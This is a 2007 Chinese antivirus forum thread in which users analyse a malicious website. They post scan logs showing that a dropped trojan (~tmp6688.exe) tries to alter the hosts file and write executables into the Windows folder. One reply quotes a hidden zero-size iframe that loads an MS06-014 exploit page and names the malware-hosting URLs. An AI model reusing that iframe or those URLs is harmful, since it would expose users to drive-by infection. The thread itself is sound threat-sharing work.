搜索
查看: 2917|回复: 16
收起左侧

转一个毒网

[复制链接]
观弈书童
发表于 2007-3-26 16:36:07 | 显示全部楼层 |阅读模式
hxxp://fei6yu.99star.net/
tonger2003
发表于 2007-3-26 16:40:12 | 显示全部楼层
样本~~

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
The EQs
发表于 2007-3-26 16:41:39 | 显示全部楼层
Scan performed at: 2007-3-26 16:41:56
Scanning Log
NOD32 version 2144 (20070325) NT
Command line: C:\Documents and Settings\EQ2\桌面\~tmp6688.rar
Operating memory - is OK

Date: 26.3.2007  Time: 16:42:00
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\~tmp6688.rar
C:\Documents and Settings\EQ2\桌面\~tmp6688.rar ?RAR ?~tmp6688.exe - Win32/Pacex.Gen virus
Number of scanned files: 2
Number of threats found: 1
Number of files cleaned: 1
Time of completion: 16:42:00 Total scanning time: 0 sec (00:00:00)
龙井茶
发表于 2007-3-26 16:42:04 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\Documents and Settings\Administrator\桌面\~tmp6688.rar'
C:\Documents and Settings\Administrator\桌面\~tmp6688.rar
  [0] Archive type: RAR
  --> ~tmp6688.exe
      [DETECTION] Is the Trojan horse TR/Crypt.NSPM.Gen
      [INFO]      A backup was created as '467487ff.qua'  ( QUARANTINE )
      [INFO]      The file was deleted!
绅博周幸
发表于 2007-3-26 16:43:54 | 显示全部楼层
2007-3-26        1:41:47        已由访问保护规则禁止         MT-16D974393A12\wynn        C:\Documents and Settings\wynn\My Documents\~tmp6688.exe        C:\WINDOWS\system32\drivers\etc\hosts        通用标准保护:保护网络设置        已阻止的操作: 写入
2007-3-26        1:41:49        已由访问保护规则禁止         MT-16D974393A12\wynn        C:\Documents and Settings\wynn\My Documents\~tmp6688.exe        C:\WINDOWS\uninstall\rundl132.exe        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件        已阻止的操作: 创建
2007-3-26        1:41:50        已由访问保护规则禁止         MT-16D974393A12\wynn        C:\Documents and Settings\wynn\My Documents\~tmp6688.exe        C:\WINDOWS\RichDll.dll        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件        已阻止的操作: 创建
2007-3-26        1:41:50        已由访问保护规则禁止         MT-16D974393A12\wynn        C:\Documents and Settings\wynn\My Documents\~tmp6688.exe        C:\WINDOWS\system32\drivers\etc\hosts        通用标准保护:保护网络设置        已阻止的操作: 写入

金剑
头像被屏蔽
发表于 2007-3-26 16:47:37 | 显示全部楼层
风暴胜者V2 测试版本(http://www.v0day.com)
_________您的安全是我们的责任_______________
载入病毒库…进行整理…分配内存…可以使用



===============================================
   ___________病毒查杀结果__________________


===============================================

2007年3月26日16时47分34秒 开始查杀C:\Documents and Settings\Administrator\桌面\新建文件夹\~tmp6688
威胁性文件:C:\Documents and Settings\Administrator\桌面\新建文件夹\~tmp6688\~tmp6688.exe
=========================================

_________文件性质分析结果________________
"带壳"仅指文件性质,仅供专业人员分析使用。


-----------------------------------------

2007年3月26日16时47分35秒收起线程…100% 查杀完毕!
扫描文件:1查杀病毒:1
gbwyy
头像被屏蔽
发表于 2007-3-26 16:57:11 | 显示全部楼层
AVAST毫不犹豫的查杀了
dikex
发表于 2007-3-26 18:19:00 | 显示全部楼层
和木蚂蚁昨天被挂的那个是一样的,同样指向于http://web.77276.com/0.htm这有毒网页,但这个网页居然更新了,在最后免加上了一句
<iframe src="http://web.77276.com/2.htm" width="0" height="0" frameborder="0"></iframe>

而http://web.77276.com/2.htm里面也是利用了ms06-014漏洞,挂的那个毒也是http://do.77276.com/0.exe,但这次是以~tmp+4位随机数字的名字(如:~tmp5246)下载到windows文件夹里面,并利用cmd来调用

[ 本帖最后由 dikex 于 2007-3-26 18:20 编辑 ]
gggh
发表于 2007-3-26 18:20:50 | 显示全部楼层
卡巴杀...
红伞杀...
hzq277284
头像被屏蔽
发表于 2007-3-26 21:07:47 | 显示全部楼层
蜘蛛

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-9-15 18:16 , Processed in 0.049381 second(s), 5 queries , MemCache On.

快速回复 返回顶部 返回列表